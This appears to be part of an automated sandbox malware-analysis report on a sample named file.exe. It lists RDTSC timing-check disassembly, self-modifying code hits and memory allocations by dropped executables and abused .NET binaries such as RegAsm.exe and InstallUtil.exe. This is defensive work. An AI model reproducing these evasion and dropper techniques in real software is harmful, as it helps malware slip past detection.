                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5400AB9 second address: 5400B11 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F1F50CBBC3Ch 0x00000008 xor eax, 1F69DC08h 0x0000000e jmp 00007F1F50CBBC3Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007F1F50CBBC48h 0x0000001c add eax, 5F23FE68h 0x00000022 jmp 00007F1F50CBBC3Bh 0x00000027 popfd 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov cx, di 0x00000031 popad 0x00000032 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5400B11 second address: 5400B16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5400B16 second address: 5400B7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F1F50CBBC3Fh 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F1F50CBBC40h 0x00000017 or cx, 5328h 0x0000001c jmp 00007F1F50CBBC3Bh 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007F1F50CBBC48h 0x00000028 and ah, FFFFFF88h 0x0000002b jmp 00007F1F50CBBC3Bh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54008A2 second address: 54008A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0022 second address: 53A0027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5400E40 second address: 5400E61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 226B4A8Eh 0x00000008 mov cx, dx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 movzx eax, di 0x00000013 mov bx, A6ECh 0x00000017 popad 0x00000018 mov dword ptr [esp], ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5400E61 second address: 5400E7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC48h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5400E7D second address: 5400F23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 mov esi, 47C24849h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 jmp 00007F1F50F77984h 0x00000015 push dword ptr [ebp+0Ch] 0x00000018 jmp 00007F1F50F77980h 0x0000001d push dword ptr [ebp+08h] 0x00000020 jmp 00007F1F50F77980h 0x00000025 push 092B3459h 0x0000002a jmp 00007F1F50F77981h 0x0000002f xor dword ptr [esp], 092A345Bh 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 jmp 00007F1F50F77983h 0x0000003e pushfd 0x0000003f jmp 00007F1F50F77988h 0x00000044 adc al, FFFFFFB8h 0x00000047 jmp 00007F1F50F7797Bh 0x0000004c popfd 0x0000004d popad 0x0000004e rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5400F23 second address: 5400F29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5400F29 second address: 5400F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5400F2D second address: 5400F31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5400FA8 second address: 5400FCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F77989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5400FCC second address: 5400FD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FABB01 second address: FABB0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F1F50F77976h 0x0000000a popad 0x0000000b rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FABD03 second address: FABD2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F50CBBC48h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c jbe 00007F1F50CBBC44h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FABD2C second address: FABD30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B039F second address: 53B0416 instructions: 0x00000000 rdtsc 0x00000002 mov edx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F1F50CBBC3Eh 0x0000000d push eax 0x0000000e jmp 00007F1F50CBBC3Bh 0x00000013 xchg eax, ebp 0x00000014 jmp 00007F1F50CBBC46h 0x00000019 mov ebp, esp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F1F50CBBC3Eh 0x00000022 xor si, 1888h 0x00000027 jmp 00007F1F50CBBC3Bh 0x0000002c popfd 0x0000002d mov ecx, 2D8848FFh 0x00000032 popad 0x00000033 push FFFFFFFEh 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F1F50CBBC41h 0x0000003c rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0416 second address: 53B0486 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F77981h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 3554A069h 0x0000000e jmp 00007F1F50F77987h 0x00000013 xor dword ptr [esp], 43AC6071h 0x0000001a pushad 0x0000001b mov esi, 6E4935DBh 0x00000020 mov ax, 54B7h 0x00000024 popad 0x00000025 push 4519C273h 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d pushad 0x0000002e popad 0x0000002f pushfd 0x00000030 jmp 00007F1F50F77982h 0x00000035 adc al, FFFFFFD8h 0x00000038 jmp 00007F1F50F7797Bh 0x0000003d popfd 0x0000003e popad 0x0000003f rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0486 second address: 53B049E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F50CBBC44h 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B049E second address: 53B04E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 31D5EB8Dh 0x0000000f jmp 00007F1F50F77987h 0x00000014 mov eax, dword ptr fs:[00000000h] 0x0000001a jmp 00007F1F50F77986h 0x0000001f nop 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B04E7 second address: 53B04EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B04EB second address: 53B04EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B04EF second address: 53B04F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B04F5 second address: 53B04FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B04FB second address: 53B04FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B04FF second address: 53B0503 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0503 second address: 53B05A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e mov dx, 3928h 0x00000012 popad 0x00000013 nop 0x00000014 pushad 0x00000015 mov bx, 0540h 0x00000019 push edx 0x0000001a pushfd 0x0000001b jmp 00007F1F50CBBC44h 0x00000020 sbb esi, 30426B88h 0x00000026 jmp 00007F1F50CBBC3Bh 0x0000002b popfd 0x0000002c pop esi 0x0000002d popad 0x0000002e sub esp, 1Ch 0x00000031 pushad 0x00000032 movsx edi, cx 0x00000035 mov ebx, eax 0x00000037 popad 0x00000038 xchg eax, ebx 0x00000039 jmp 00007F1F50CBBC48h 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 movzx ecx, dx 0x00000045 pushfd 0x00000046 jmp 00007F1F50CBBC49h 0x0000004b sub ecx, 2B84DAB6h 0x00000051 jmp 00007F1F50CBBC41h 0x00000056 popfd 0x00000057 popad 0x00000058 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B05A3 second address: 53B0676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1F50F77987h 0x00000008 mov ebx, ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F1F50F77980h 0x00000015 or cl, 00000038h 0x00000018 jmp 00007F1F50F7797Bh 0x0000001d popfd 0x0000001e jmp 00007F1F50F77988h 0x00000023 popad 0x00000024 xchg eax, esi 0x00000025 jmp 00007F1F50F77980h 0x0000002a push eax 0x0000002b jmp 00007F1F50F7797Bh 0x00000030 xchg eax, esi 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F1F50F77984h 0x00000038 or esi, 03800C28h 0x0000003e jmp 00007F1F50F7797Bh 0x00000043 popfd 0x00000044 jmp 00007F1F50F77988h 0x00000049 popad 0x0000004a xchg eax, edi 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F1F50F77987h 0x00000052 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0676 second address: 53B067C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B067C second address: 53B06B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F7797Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov bl, ch 0x0000000f popad 0x00000010 xchg eax, edi 0x00000011 jmp 00007F1F50F7797Dh 0x00000016 mov eax, dword ptr [76FAB370h] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F1F50F7797Dh 0x00000022 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B06B4 second address: 53B0707 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [ebp-08h], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F1F50CBBC3Ch 0x00000013 or ax, 18D8h 0x00000018 jmp 00007F1F50CBBC3Bh 0x0000001d popfd 0x0000001e mov dl, ah 0x00000020 popad 0x00000021 xor eax, ebp 0x00000023 jmp 00007F1F50CBBC40h 0x00000028 nop 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0707 second address: 53B070B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B070B second address: 53B070F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B070F second address: 53B0715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0715 second address: 53B0764 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F1F50CBBC41h 0x00000011 adc esi, 2BC97486h 0x00000017 jmp 00007F1F50CBBC41h 0x0000001c popfd 0x0000001d movzx eax, bx 0x00000020 popad 0x00000021 nop 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0764 second address: 53B0768 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0768 second address: 53B076E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B076E second address: 53B07BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 mov di, FB6Ch 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c lea eax, dword ptr [ebp-10h] 0x0000000f pushad 0x00000010 mov di, 4C04h 0x00000014 mov cx, di 0x00000017 popad 0x00000018 mov dword ptr fs:[00000000h], eax 0x0000001e jmp 00007F1F50F7797Fh 0x00000023 mov esi, dword ptr [ebp+08h] 0x00000026 jmp 00007F1F50F77986h 0x0000002b mov eax, dword ptr [esi+10h] 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B07BD second address: 53B07C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B07C1 second address: 53B07C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B07C7 second address: 53B0877 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b jmp 00007F1F50CBBC40h 0x00000010 jne 00007F1FC27BB169h 0x00000016 jmp 00007F1F50CBBC40h 0x0000001b sub eax, eax 0x0000001d pushad 0x0000001e mov edx, 42205FF2h 0x00000023 popad 0x00000024 mov dword ptr [ebp-20h], eax 0x00000027 pushad 0x00000028 movsx edi, si 0x0000002b popad 0x0000002c mov ebx, dword ptr [esi] 0x0000002e pushad 0x0000002f call 00007F1F50CBBC46h 0x00000034 pushad 0x00000035 popad 0x00000036 pop ecx 0x00000037 mov eax, edx 0x00000039 popad 0x0000003a mov dword ptr [ebp-24h], ebx 0x0000003d pushad 0x0000003e mov bh, 65h 0x00000040 call 00007F1F50CBBC42h 0x00000045 mov bx, cx 0x00000048 pop esi 0x00000049 popad 0x0000004a test ebx, ebx 0x0000004c pushad 0x0000004d jmp 00007F1F50CBBC43h 0x00000052 popad 0x00000053 je 00007F1FC27BB048h 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e popad 0x0000005f rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0877 second address: 53B087D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B087D second address: 53B08AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp ebx, FFFFFFFFh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1F50CBBC3Dh 0x00000013 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B08AC second address: 53B08B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B08B2 second address: 53B08B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B08B6 second address: 53B039F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F1FC2A76D33h 0x0000000d jne 00007F1F50F77999h 0x0000000f xor ecx, ecx 0x00000011 mov dword ptr [esi], ecx 0x00000013 mov dword ptr [esi+04h], ecx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], ecx 0x0000001c mov dword ptr [esi+10h], ecx 0x0000001f mov dword ptr [esi+14h], ecx 0x00000022 mov ecx, dword ptr [ebp-10h] 0x00000025 mov dword ptr fs:[00000000h], ecx 0x0000002c pop ecx 0x0000002d pop edi 0x0000002e pop esi 0x0000002f pop ebx 0x00000030 mov esp, ebp 0x00000032 pop ebp 0x00000033 retn 0004h 0x00000036 nop 0x00000037 pop ebp 0x00000038 ret 0x00000039 add esi, 18h 0x0000003c pop ecx 0x0000003d cmp esi, 00DD5678h 0x00000043 jne 00007F1F50F77960h 0x00000045 push esi 0x00000046 call 00007F1F50F781E3h 0x0000004b push ebp 0x0000004c mov ebp, esp 0x0000004e push dword ptr [ebp+08h] 0x00000051 call 00007F1F5559AE1Dh 0x00000056 mov edi, edi 0x00000058 pushad 0x00000059 push esi 0x0000005a mov ah, bh 0x0000005c pop eax 0x0000005d push eax 0x0000005e push edx 0x0000005f movsx edx, ax 0x00000062 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0CE4 second address: 53A0D01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0D01 second address: 53A0D26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 5892h 0x00000007 movsx ebx, si 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f push ecx 0x00000010 movsx edx, cx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F1F50F7797Fh 0x0000001b rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0D26 second address: 53A0D54 instructions: 0x00000000 rdtsc 0x00000002 mov edx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F1F50CBBC3Eh 0x00000011 sub si, 2308h 0x00000016 jmp 00007F1F50CBBC3Bh 0x0000001b popfd 0x0000001c mov ebx, esi 0x0000001e popad 0x0000001f rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0D54 second address: 53A0D89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 call 00007F1F50F77987h 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F1F50F77982h 0x00000016 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0D89 second address: 53A0D9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ebx 0x00000010 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0D9F second address: 53A0DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0DA7 second address: 53A0DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 73E81E second address: 73E840 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F77986h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop eax 0x00000011 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DDE897 instructions caused by: Self-modifying code
                                  Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DDE77C instructions caused by: Self-modifying code
                                  Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F99E69 instructions caused by: Self-modifying code
                                  Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: FC5B0F instructions caused by: Self-modifying code
                                  Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: FA75F9 instructions caused by: Self-modifying code
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 73E897 instructions caused by: Self-modifying code
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 73E77C instructions caused by: Self-modifying code
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 8F9E69 instructions caused by: Self-modifying code
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 925B0F instructions caused by: Self-modifying code
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 9075F9 instructions caused by: Self-modifying code
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeMemory allocated: 9C0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeMemory allocated: 27A0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeMemory allocated: D40000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 15A0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 3280000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 5280000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeMemory allocated: 1330000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeMemory allocated: 3000000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeMemory allocated: 5000000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeMemory allocated: 1000000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeMemory allocated: 2D50000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeMemory allocated: 4D50000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeMemory allocated: 2D00000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeMemory allocated: 2F00000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeMemory allocated: 2D40000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeMemory allocated: 1190000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeMemory allocated: 29E0000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeMemory allocated: 2830000 memory reserve | memory write watch
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: B40000 memory reserve | memory write watch
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2850000 memory reserve | memory write watch
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 4850000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeMemory allocated: 1250000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeMemory allocated: 3030000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeMemory allocated: 2D60000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeMemory allocated: 1700000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeMemory allocated: 30C0000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeMemory allocated: 50C0000 memory reserve | memory write watch
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: C50000 memory reserve | memory write watch
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 27C0000 memory reserve | memory write watch
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 26C0000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exeMemory allocated: BA0000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exeMemory allocated: 27E0000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exeMemory allocated: 47E0000 memory reserve | memory write watch
